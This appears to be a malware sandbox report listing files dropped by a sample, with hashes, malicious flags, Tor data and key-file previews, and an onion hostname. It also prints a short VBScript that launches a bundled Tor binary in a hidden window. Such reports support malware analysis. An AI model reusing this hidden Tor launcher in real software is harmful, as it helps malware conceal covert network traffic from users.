                                                                          Encrypted:false
                                                                          SSDEEP:384:YMY4JVtG1hIcCyf/40VVq1h8PXt2h4YVc1h19U4uWVxJ1herWd24VdzVH591hFst:mELGf/HJiO96xyhC5WLJ4G26ZJQlSyLT
                                                                          MD5:6E33D0EF7D459A62A60AA5DE8760B35A
                                                                          SHA1:278C0FD656F9BA3ED4FCD181D8827516479A5D34
                                                                          SHA-256:59CBCB153D32F2B054574DB67E1388D6773F43073A3C13279CCACC5437C0129F
                                                                          SHA-512:3080CC343449133FFDDA7796790510DF2F8DB85DA57E6E1E8B9297749BB01777072769E0E40D4980A570B32A9F513453B64E5D70B1C3639989649AD39C2D8962
                                                                          Malicious:false
                                                                          Preview:dir-key-certificate-version 3..fingerprint 0232AF901C31A04EE9848595AF9BB7620D4C5B2E..dir-key-published 2024-05-03 13:08:12..dir-key-expires 2025-05-03 13:08:12..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAu9O0Pueesn0+29BlxZs60mBqehjdQtgSnKOm9QZxbQ0xrMQgbFnR..hWbKD8erenyeFk2SF6AJkbyzgYC89hyPW+8GBDmg5bE8fRKjgV/nI3tY2m4rkY3u..zSmYIdwqHUUc98Xzt9PaQ8IJAlDBY4XLKrWmJMxSyhBlVEept7+9Tj23qowW44Mz..xPJZ1aFkB1FpkD6qmoCzVZbhXy3cGt1nDwdJK7KqlaXziz9pFiw8PzTVU2xFgJNy..+nEcT72DBtk3G5K2Riu/aXY/D541Cioj9KMV4Nv4g8aBKx58Xq2tq1pFkc1Bqj1y..2MomVR3iskFzlqC8yKWGVe4OP2IaOhtcQJYp5GR9q+dWnr53WWNVxNu3sA9iMal3..PJUk5pIYrsmArGew5gmlCe+Al46nPINxc7ouztmStAV+2F6SpZlKOcstnT+KJ52O..1xnOSaj/WnzG2o4KZ9UrFQoUNOLQJcelPcC+vrinMk9BQPcB072l9NjpUBC9brsW..qTCMStn1jfDDAgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAvw0tPel/aew1u6MA7JdxIsH5SEtj2yIexRYmAqxSv1Vmrknmr9rx..QC4NqGZh3zZaHgcn7k6pIXWHsMhlGSwJ6NE/xaG8upNJtRf3xBfpmTgfN9qJ4GjC..RS/jTHdYV9PtGrQ8BAbsUA205w2J
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (1006)
                                                                          Category:dropped
                                                                          Size (bytes):2717514
                                                                          Entropy (8bit):5.608451164793479
                                                                          Encrypted:false
                                                                          SSDEEP:12288:HGs48rhSKnKecfI4He1Ag+lficC23TcSJR8NwCNv4VqBU7keaRt/f1QVgRXz:g4hSKnBkUd29GNws4oBc+dNRD
                                                                          MD5:25B77A84D941167527B4073195CB2BCC
                                                                          SHA1:BDEE047E42622F49D58594AAAD01300BE7C35D34
                                                                          SHA-256:5347DCBF1BE0D63ACCE745341864CC2C5BAB82249D745BB745CC26A0ECEB40EA
                                                                          SHA-512:A2D36134C52D8916BC50A72DB3CF0344F7379A17B22220C41D3B4113B2D865F4470D6BC3B06C1E1779B6838212FF399461B5CDD602875E74F0130A4B595D12F2
                                                                          Malicious:false
                                                                          Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-07-23 13:00:00.fresh-until 2024-07-23 14:00:00.valid-until 2024-07-23 16:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10,0.4.8.11,0.4.8.12.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthD
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (16050)
                                                                          Category:dropped
                                                                          Size (bytes):19629594
                                                                          Entropy (8bit):4.844513725137488
                                                                          Encrypted:false
                                                                          SSDEEP:24576:LyHJuBfheKEZ3aBKenGd3gwbA6IFphYgXC37IHn5jG1/tJNDf9ax01a7XlVWXH1g:ZT6DqPzsLHuY3pZ4iC1lpZYq
                                                                          MD5:59704A2369BC1C2AAE6D79E22ABCD606
                                                                          SHA1:4C77600ABC5DF2599AE236ED875F122B53E32A5F
                                                                          SHA-256:D65B76E9D62FD7EEE29E4F0127EFC51966F8E4413859F64AF7313DC1B17D8D66
                                                                          SHA-512:B4D0873EEF59B86DCF4B6A2FB19A0FD37FD6A6DDA79BA3C62A4BB133043480EB8A33DB2493E986E6007651633078F3E7C302EC9AC6ED5E7FBF8E7C8863BA792D
                                                                          Malicious:false
                                                                          Preview:@last-listed 2024-07-23 13:47:20.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAJoBdlbkRUt7p5I23tmTwx3PXwOFy6Cah3v778ixbqIuCezXDnB0J0QN.SbjlBTNS8Y1/+V+sOWdv0MT4EDZiHfLXUI/rA0fEe2Qz0WUesKwCoPJ7WXlR6Z+u.yg5mhsC/DlE07JCsqmM1GH0VTrUkt400T52eRgqogGGKsxL0KOCRAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key qOViKoD874Fezs+hSh+fXS1LsdUmwOU0xv4DnLkdixc.id ed25519 84uy+GOf0kZ/zif8Mh6sAxUR/uYFh1YhINv4Tuip2jk.@last-listed 2024-07-23 13:47:20.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAPXrWOZfR/x6NjGjpvS+TArHXr3cmBgAM+Y0DLq/1SiyLGs2snZ/jBPO.MRHluSQ4dQMxUTp/OCWuCvxUzSc3YdwfLiwXagUFkh/Zb4LMLYpcV1BaJqL89ahr.E0MJK6V1++xhSNNZOLnQwWQ39i4pn98IgDlfrj+3SN8auwoVlfRBAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key 0cpfQdAMa3T/LycWAqfdEu88YaY5mO1oUNxO/pNLADs.family $4E9B9BE2C87DFA3BBCF8B4907F750E326A2BD2D4 $506600D9FBACE4D2D559C869D8516D4A74DBBD22 $A0298C0A9A045F1449C07929C7DD91E41C7F95B2 $C7865D58EEFE96B92333E3C8BE3C0AAAA0000EEF.id ed25519 iIrMZZeWCDRiB51oE9Em2thecMzvbZaoz819nnRNdKA.@last-lis
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (354), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4399
                                                                          Entropy (8bit):5.282823959019943
                                                                          Encrypted:false
                                                                          SSDEEP:48:cSrN2DU4/sP+9qu4bVFNkaPjpLUHt4RS7TYpkb30QBvHrX6S+n:BIDU4/iIquGV8EFyt4RWTMXaLXt2
                                                                          MD5:B47682D93A66C5FFB868CC230ACD9993
                                                                          SHA1:6F93ED55B4B3131D768038E5E42F915E0ED58E4F
                                                                          SHA-256:31935D4B556C4BDE8E2116D80CB79C325AF826B07119BC74D9118A5E07815F11
                                                                          SHA-512:A9ED11169942A2DDC4256C0F6172DA1D0E428F999A3EE1EFABD7015C6191F2498E9E3F15A4E6BDAAE6A2473544BFDEDDA62622145F4EC24C22E7FA3B1171D5A0
                                                                          Malicious:false
                                                                          Preview:# Tor state file last generated on 2024-07-23 09:49:45 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 575 1..CircuitBuildTimeBin 625 2..CircuitBuildTimeBin 775 1..CircuitBuildTimeBin 825 1..CircuitBuildTimeBin 875 2..CircuitBuildTimeBin 925 1..CircuitBuildTimeBin 975 1..CircuitBuildTimeBin 1075 2..CircuitBuildTimeBin 1125 5..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 1275 4..CircuitBuildTimeBin 1325 3..CircuitBuildTimeBin 1375 1..CircuitBuildTimeBin 1425 1..CircuitBuildTimeBin 1525 1..CircuitBuildTimeBin 1575 2..CircuitBuildTimeBin 1625 1..CircuitBuildTimeBin 2125 1..CircuitBuildTimeBin 2525 1..Dormant 0..Guard in=default rsa_id=0A8FB5E28FFE1DB020F2E37410B25ACA7367D8E9 nickname=bu11seye sampled_on=2024-07-23T00:06:35 sampled_idx=0 sampled_by=0.4.5.10 listed=1 confirmed_on=2024-07-18T04:20:50 confirmed_idx=0 pb_use_attempts=8.000000 pb_use_successes=8.000000 pb_circ_attempts=14.000000 pb_circ_successes=14.000000 pb_successf
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (354), with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):4399
                                                                          Entropy (8bit):5.282823959019943
                                                                          Encrypted:false
                                                                          SSDEEP:48:cSrN2DU4/sP+9qu4bVFNkaPjpLUHt4RS7TYpkb30QBvHrX6S+n:BIDU4/iIquGV8EFyt4RWTMXaLXt2
                                                                          MD5:B47682D93A66C5FFB868CC230ACD9993
                                                                          SHA1:6F93ED55B4B3131D768038E5E42F915E0ED58E4F
                                                                          SHA-256:31935D4B556C4BDE8E2116D80CB79C325AF826B07119BC74D9118A5E07815F11
                                                                          SHA-512:A9ED11169942A2DDC4256C0F6172DA1D0E428F999A3EE1EFABD7015C6191F2498E9E3F15A4E6BDAAE6A2473544BFDEDDA62622145F4EC24C22E7FA3B1171D5A0
                                                                          Malicious:false
                                                                          Preview:# Tor state file last generated on 2024-07-23 09:49:45 local time..# Other times below are in UTC..# You *do not* need to edit this file.....CircuitBuildTimeBin 575 1..CircuitBuildTimeBin 625 2..CircuitBuildTimeBin 775 1..CircuitBuildTimeBin 825 1..CircuitBuildTimeBin 875 2..CircuitBuildTimeBin 925 1..CircuitBuildTimeBin 975 1..CircuitBuildTimeBin 1075 2..CircuitBuildTimeBin 1125 5..CircuitBuildTimeBin 1175 1..CircuitBuildTimeBin 1275 4..CircuitBuildTimeBin 1325 3..CircuitBuildTimeBin 1375 1..CircuitBuildTimeBin 1425 1..CircuitBuildTimeBin 1525 1..CircuitBuildTimeBin 1575 2..CircuitBuildTimeBin 1625 1..CircuitBuildTimeBin 2125 1..CircuitBuildTimeBin 2525 1..Dormant 0..Guard in=default rsa_id=0A8FB5E28FFE1DB020F2E37410B25ACA7367D8E9 nickname=bu11seye sampled_on=2024-07-23T00:06:35 sampled_idx=0 sampled_by=0.4.5.10 listed=1 confirmed_on=2024-07-18T04:20:50 confirmed_idx=0 pb_use_attempts=8.000000 pb_use_successes=8.000000 pb_circ_attempts=14.000000 pb_circ_successes=14.000000 pb_successf
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):3722717
                                                                          Entropy (8bit):4.010901367141998
                                                                          Encrypted:false
                                                                          SSDEEP:49152:Pa4vmG4rp0QBJycSB2mTZJlZYofSWeT9P9utTTCbvaSa+:0
                                                                          MD5:7AD60C3E9CDB9992B1C2F5D79701B812
                                                                          SHA1:B3A9770171D3060502B7F13C0618BE109B92DF6C
                                                                          SHA-256:0AA9299BFF0A8AE1B1FEC6B6C96C551CC2FC31E213BD11EA9F414D571CC8C9D3
                                                                          SHA-512:0939E3F5333395B995F35F0B635FEA0089BAEF9817ECE6FB54BFEB3DC51DC48A6369605C5EAEC53EC2C37247789C707FC02579EA3DE2A53F5813222542DC9460
                                                                          Malicious:false
                                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Thu, 12 Aug 2021 05:51:15 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.16777216,16777471,AU.16777472,16778239,CN.16778240,16779263,AU.16779264,16781311,CN.16781312,16785407,JP.16785408,16793599,CN.16793600,16809983,JP.16809984,16842751,TH.16842752,16843007,CN.16843008,16843263,AU.16843264,16859135,CN.16859136,16875519,JP.16875520,16908287,TH.16908288,16909055,CN.16909056,16909311,AU.16909312,16941055,CN.16941056,16973823,TH.16973824,17039359,CN.17039360,17039615,AU.17039616,17072127,CN.17072128,17104895,TH.17104896,17170431,JP.17170432,17301503,IN.17301504,17367039
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):5379114
                                                                          Entropy (8bit):3.102923211242497
                                                                          Encrypted:false
                                                                          SSDEEP:24576:iNjMD2TFE4TisycmlLikLPTOyjWGYoOxMUV5TnL/rg1ThnL/P7dDb3z7LAq7v80P:x
                                                                          MD5:69AAC4453831397E074682E38B1C6F99
                                                                          SHA1:410B70763FC675B3622264FAA0FC67B78FDE30C2
                                                                          SHA-256:F90A98373DBCBA676A38C2E98DE16DADB2D44FC3D5389C74E43A84C2F16DB81B
                                                                          SHA-512:91C274C1DCEBAAD1CA0530CD560A51D39B3842126F6F317806AF562DCBC701BAF49E2B3AA2504C187DE3A41ED13005E92A6E511DBC0708974379CE79258F8CD1
                                                                          Malicious:false
                                                                          Preview:# This file has been converted from the IPFire Location database.# using Tor's geoip-db-tool. For more information on the data, see.# https://location.ipfire.org/..#.# Below is the header from the original export:.#.#.# Location Database Export.#.# Generated: Thu, 12 Aug 2021 05:51:15 GMT.# Vendor: IPFire Project.# License: CC BY-SA 4.0.#.# This database has been obtained from https://location.ipfire.org/.#.# Find the full license terms at https://creativecommons.org/licenses/by-sa/4.0/.#.
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):4.671973149067329
                                                                          Encrypted:false
                                                                          SSDEEP:3:ZlUnVxagdmKOYY9dRcvn:kmgdmKOJZcv
                                                                          MD5:97FE17356A83653904C59CF66A71711D
                                                                          SHA1:8C06E0700A1EF9B29FAC091D715C811A427BF8E7
                                                                          SHA-256:545B5D1BD08844B292C4458FA6B675D9AF965EB4B05634F0033C4160109234FF
                                                                          SHA-512:D481B09E396BFC7CE15858D723175A9AA66D12EC731B08334B302BD3BE3896ED713AACDDD3CB8C87AA104BAF1A18973BC049337AB974D626FA152A08AC79B80F
                                                                          Malicious:false
                                                                          Preview:lfrtflatnytdw3qe65i2u4h6dfzh2nv37v3gf26n25bokro6r6awkxid.onion..
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):5.402114648336088
                                                                          Encrypted:false
                                                                          SSDEEP:3:16GGRAAYlXXJigGhY6vA+fn:XuAAYlXXJigKLVn
                                                                          MD5:207A74CCC8483CFA1CAA462087AA215F
                                                                          SHA1:C284DA64D1659181451F8FA0681EF20C01E8AA08
                                                                          SHA-256:5C22987DE652C061396D77B61698E51B62FB860FB47274BCD13ADD7563ACC810
                                                                          SHA-512:92A8D4252CAB0505CAE18DAA40A7B1BBD2929396C2F3034253547BC8559B94347F84CEC8FCD85EDF4ED8BA1218EB0B9E6EA6CA95D5FA60F918495DA117D31E8E
                                                                          Malicious:false
                                                                          Preview:== ed25519v1-public: type0 ==...Yc2..n&;n..Q.p..r}6..vb...B.E..
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):96
                                                                          Entropy (8bit):6.019705599611885
                                                                          Encrypted:false
                                                                          SSDEEP:3:16GGx6qAYlfY3Bjv/WIU5frzKYuo+O9Pnd:XwAYlw3Bjv/WBfi4d
                                                                          MD5:4B3646A38CA8023A4FDB2328537D9C76
                                                                          SHA1:89CA6E2BE3B3555205ABF43248088C5A5F14942E
                                                                          SHA-256:6190545B0E16BEF305B9145D0283F274808A8A8F626899C1CA5DD02EF4132F96
                                                                          SHA-512:1DCD195E7B46D194051E4464C1213997411B279453EB00CECABB3788BA7824648DDEC03CE856327994067B148B1534CA67A6203B8C9D49A5B9D1BF53A71B198D
                                                                          Malicious:false
                                                                          Preview:== ed25519v1-secret: type0 ==....(...,..]..>.B+...9.0..-.O...jzz.\...c....Z..4a....?.z..u...j.8
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):3655740
                                                                          Entropy (8bit):6.4622987038409
                                                                          Encrypted:false
                                                                          SSDEEP:98304:gNuOztMCl6beK03dnwzje1UZecMioeWhuw6N7hpupY1CPwDv3uFfJUz5XlgDzCRK:AHaCl6beK03dnwzje1wecboeWhuZN7hq
                                                                          MD5:6D48D76A4D1C9B0FF49680349C4D28AE
                                                                          SHA1:1BB3666C16E11EFF8F9C3213B20629F02D6A66CB
                                                                          SHA-256:3F08728C7A67E4998FBDC7A7CB556D8158EFDCDAF0ACF75B7789DCCACE55662D
                                                                          SHA-512:09A4FD7B37CF52F6A0C3BB0A7517E2D2439F4AF8E03130AED3296D7448585EA5E3C0892E1E1202F658EF2D083CE13C436779E202C39620A70A17B026705C65C9
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: 7h2eHzSa61.exe, Detection: malicious
                                                                          • Filename: file.exe, Detection: malicious
                                                                          • Filename: SqhpdzwbpB.exe, Detection: malicious
                                                                          • Filename: jtfCFDmLdX.exe, Detection: malicious
                                                                          • Filename: vSlVoTPrmP.exe, Detection: malicious
                                                                          • Filename: RO67OsrIWi.exe, Detection: malicious
                                                                          • Filename: NxrkCS4fDD.exe, Detection: malicious
                                                                          • Filename: 7WOfaFsPQv.exe, Detection: malicious
                                                                          • Filename: Rgi3BxJNQJ.exe, Detection: malicious
                                                                          • Filename: 2y1JbYuXUD.exe, Detection: malicious
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1144039
                                                                          Entropy (8bit):6.2640955652625285
                                                                          Encrypted:false
                                                                          SSDEEP:24576:IdsuH81r7Lfml/aakxLDHGlOhRz7xiOStGX8PxUS2mmAWW:6uL0a3xLDHG8hRz7xiOzX8PxUfmt
                                                                          MD5:A3BF8E33948D94D490D4613441685EEE
                                                                          SHA1:75ED7F6E2855A497F45B15270C3AD4AED6AD02E2
                                                                          SHA-256:91C812A33871E40B264761F1418E37EBFEB750FE61CA00CBCBE9F3769A8BF585
                                                                          SHA-512:C20EF2EFCACB5F8C7E2464DE7FDE68BF610AB2E0608FF4DAED9BF676996375DB99BEE7E3F26C5BD6CCA63F9B2D889ED5460EC25004130887CD1A90B892BE2B28
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: 7h2eHzSa61.exe, Detection: malicious
                                                                          • Filename: file.exe, Detection: malicious
                                                                          • Filename: SqhpdzwbpB.exe, Detection: malicious
                                                                          • Filename: jtfCFDmLdX.exe, Detection: malicious
                                                                          • Filename: vSlVoTPrmP.exe, Detection: malicious
                                                                          • Filename: RO67OsrIWi.exe, Detection: malicious
                                                                          • Filename: NxrkCS4fDD.exe, Detection: malicious
                                                                          • Filename: 7WOfaFsPQv.exe, Detection: malicious
                                                                          • Filename: Rgi3BxJNQJ.exe, Detection: malicious
                                                                          • Filename: 2y1JbYuXUD.exe, Detection: malicious
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):975436
                                                                          Entropy (8bit):6.216593168771383
                                                                          Encrypted:false
                                                                          SSDEEP:24576:aYz/U9dYQv6wbSVliNPzIqENbtFXrFKtSRvwwfu:1Za6wbSV4NPzIqENTXrFKtIvG
                                                                          MD5:686C6A9DA6767287BF2E2126574FAFEA
                                                                          SHA1:2B0BE53C4AD4B67ECDFDCD97A717DE5A617F9EF0
                                                                          SHA-256:ABDC8CFB39D1431A1E740CF9DB2BBD604CDB7A4ED79E7E0A68D814E32A296164
                                                                          SHA-512:3CDE56FF25E53A9A04B5459113C89B8562C01B0F93E39C56BD6536824488F4F9347929935056012ADAA4982CBB8A39B61CE2F17CF92ECF02295AB1A922CD4DD4
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):683256
                                                                          Entropy (8bit):6.173131714749706
                                                                          Encrypted:false
                                                                          SSDEEP:12288:39gDBeIO2+MMF5lDeXfzxjgtSMStxEX6eg5bTCubl:meh2JMF5lqXfzxUbStyX6eKnCubl
                                                                          MD5:070F988B98E9717BBD5E870A4F8C1611
                                                                          SHA1:17FB4C990C13A4FB0A2181FE139D3515FF8D96F6
                                                                          SHA-256:9DEB6F1776DB51FA7E4E89AD2779A9F07E9F22FCB5E24481FAA291D2D27E43FE
                                                                          SHA-512:C83D793BBE26E0297F9726B32CAD5BE3F92DBC36717C143FF7D55B7BD7BB20324FD86594BC626A374252656C3EE187FA4DCA4C3933FE19952894042B2127A6FD
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1095418
                                                                          Entropy (8bit):6.031576353424405
                                                                          Encrypted:false
                                                                          SSDEEP:12288:yWgvC0/HECgnPAPQPtPTPSP7PaadQ2XDPcP8PwPhP5PhP4aEPzPaPugAPnPFgtPD:tmC0/yKX1JzUBDLTl3Ibzz2rnuNY
                                                                          MD5:BD40FF3D0CE8D338A1FE4501CD8E9A09
                                                                          SHA1:3AAE8C33BF0EC9ADF5FBF8A361445969DE409B49
                                                                          SHA-256:EBDA776A2A353F8F0690B1C7706B0CDAFF3D23E1618515D45E451FC19440501C
                                                                          SHA-512:404FB3C107006B832B8E900F6E27873324CD0A7946CDCCF4FFEEA365A725892D929E8B160379AF9782BCD6CFEB4C3C805740E21280B42BB2CE8F39F26792E5A1
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1107348
                                                                          Entropy (8bit):6.190031039194072
                                                                          Encrypted:false
                                                                          SSDEEP:24576:JOscL0k1lOI5732OutG3c1RcJq09LrXfu1UYaP3KHl20tzVBm1X6yD50H4Ine3/p:0scn5COutG3cQJtu1UYaP3KHs0tzVBmP
                                                                          MD5:945D225539BECC01FBCA32E9FF6464F0
                                                                          SHA1:A614EB470DEFEAB01317A73380F44DB669100406
                                                                          SHA-256:C697434857A039BF27238C105BE0487A0C6C611DD36CB1587C3C6B3BF582718A
                                                                          SHA-512:409F8F1E6D683A3CBE7954BCE37013316DEE086CDBD7ECDA88ACB5D94031CFF6166A93B641875116327151823CCE747BCF254C0185E0770E2B74B7C5E067BC4A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):252871
                                                                          Entropy (8bit):5.911389655551474
                                                                          Encrypted:false
                                                                          SSDEEP:6144:DZRBjnF7ModBbDCdcJfstxzeo51aU6grhog4MmwYq55:1BJlDSkYzzugduM5
                                                                          MD5:B77328DA7CEAD5F4623748A70727860D
                                                                          SHA1:13B33722C55CCA14025B90060E3227DB57BF5327
                                                                          SHA-256:46541D9E28C18BC11267630920B97C42F104C258B55E2F62E4A02BCD5F03E0E7
                                                                          SHA-512:2F1BD13357078454203092ED5DDC23A8BAA5E64202FBA1E4F98EACF1C3C184616E527468A96FF36D98B9324426DDDFA20B62B38CF95C6F5C0DC32513EBACE9E2
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):525113
                                                                          Entropy (8bit):6.099620174174238
                                                                          Encrypted:false
                                                                          SSDEEP:12288:/+Pm3Yv9CUauItmEz8HHLOA/TqlDCQdz9bVMPxTivFg:2Pm3Yv9CUauItmEz8HHLOA/TqluQdz9c
                                                                          MD5:19D7CC4377F3C09D97C6DA06FBABC7DC
                                                                          SHA1:3A3BA8F397FB95ED5DF22896B2C53A326662FCC9
                                                                          SHA-256:228FCFE9ED0574B8DA32DD26EAF2F5DBAEF0E1BD2535CB9B1635212CCDCBF84D
                                                                          SHA-512:23711285352CDEC6815B5DD6E295EC50568FAB7614706BC8D5328A4A0B62991C54B16126ED9E522471D2367B6F32FA35FEB41BFA77B3402680D9A69F53962A4A
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):172
                                                                          Entropy (8bit):4.939646411880318
                                                                          Encrypted:false
                                                                          SSDEEP:3:jaPFEm8nByK2qQZnmRdZj4I5xKpRZxHFmGZj4I5xKpRWSsMPjaPOUC:j6NqEK2dnmR5+Rl5+RBseFUC
                                                                          MD5:C066AE688069850E35E30EBA9C0FB4CA
                                                                          SHA1:75901F0E3E8488523B901FC3F7A5F21ED307E0E5
                                                                          SHA-256:816D5F7CD7C8B6AC18BD37E018A78FE95E6EE3A70EA232431C450FB4447CBF4A
                                                                          SHA-512:1A2D40EA4D759B39DE82BD3BDCF86464CA8C31F2896BCC521ED4251FC7293949930EC43B06D1742B7B71CE0FAA8D78338D7557B41B6ADC2B895263A837E326F7
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run("""C:\Program Files (x86)\Tor\tor-real.exe"" -f ""C:\Program Files (x86)\Tor\torrc"""),0..Set WshShell = Nothing
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1055744
                                                                          Entropy (8bit):6.430797346246855
                                                                          Encrypted:false
                                                                          SSDEEP:12288:U0msFd0wHnfgHtubcrJfeFDmh3CUrDVX:jOwHnfgHtuQr92mh3BV
                                                                          MD5:29E72F9FA2E399A00EB31A355289D082
                                                                          SHA1:0DB2462212F9B4ABBAD9B48B87248447C28EE2F2
                                                                          SHA-256:5C380138810D0CD5407095F22E6F515AFCCD3615F40D627774FFF59865251336
                                                                          SHA-512:028472E6D4BC4CBDB948A9366B900C3EB0D631142CD1601BD98945AF70B9C5ADE2033063051F88025C341351E26DA5628FB263BFC4F09CAFD861BFC7D1F6CB76
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:unknown
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):4229632
                                                                          Entropy (8bit):6.429803829212971
                                                                          Encrypted:false
                                                                          SSDEEP:98304:7zI+VNHtad8rAiCQDE+KOzG5En1QIonPrW29hKX:H1HtadtPQDEfEn1QIbM
                                                                          MD5:07244A2C002FFDF1986B454429EACE0B
                                                                          SHA1:D7CD121CAAC2F5989AA68A052F638F82D4566328
                                                                          SHA-256:E9522E6912A0124C0A8C9FF9BB3712B474971376A4EB4CA614BB1664A2B4ABCF
                                                                          SHA-512:4A09DB85202723A73703C5926921FEF60C3DDDAE21528A01936987306C5E7937463F94A2F4A922811DE1F76621DEF2A8A597A8B38A719DD24E6FF3D4E07492CA
